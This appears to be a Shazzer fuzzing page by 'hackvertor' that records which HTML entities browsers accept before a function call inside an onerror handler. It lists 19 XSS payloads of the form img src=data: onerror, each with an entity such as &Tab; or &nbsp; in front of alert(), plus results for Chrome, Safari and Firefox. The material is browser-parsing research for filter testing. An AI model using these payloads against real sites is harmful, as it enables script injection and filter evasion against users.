Entities allowed before function calls

Chrome logo 19
Safari logo 19
Firefox logo 19

This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created by: hackvertor

Created on: Tuesday, July 2, 2024 at 11:22:28 AM

Updated on: Wednesday, December 11, 2024 at 8:38:38 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src=data: onerror="$[data1]log('html($[data1])')">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="&puncsp;alert('&#38;puncsp;')">
<img src=data: onerror="&ensp;alert('&#38;ensp;')">
<img src=data: onerror="&Tab;alert('&#38;Tab;')">
<img src=data: onerror="&emsp;alert('&#38;emsp;')">
<img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">
<img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">
<img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">
<img src=data: onerror="&emsp13;alert('&#38;emsp13;')">
<img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">
<img src=data: onerror="&plus;alert('&#38;plus;')">
<img src=data: onerror="&semi;alert('&#38;semi;')">
<img src=data: onerror="&nbsp;alert('&#38;nbsp;')">
<img src=data: onerror="&NewLine;alert('&#38;NewLine;')">
<img src=data: onerror="&emsp14;alert('&#38;emsp14;')">
<img src=data: onerror="&excl;alert('&#38;excl;')">
<img src=data: onerror="&hairsp;alert('&#38;hairsp;')">
<img src=data: onerror="&numsp;alert('&#38;numsp;')">
<img src=data: onerror="&thinsp;alert('&#38;thinsp;')">
<img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">

Fuzz results

Chrome logo
Chrome 126.0.0.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024
Found 19 results
Loading...
Safari logo
Safari 18.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024
Found 19 results
Loading...
Firefox logo
Firefox 127.0 desktop macOS 10.15

Updated

Tue Jul 02 2024
Found 19 results
Loading...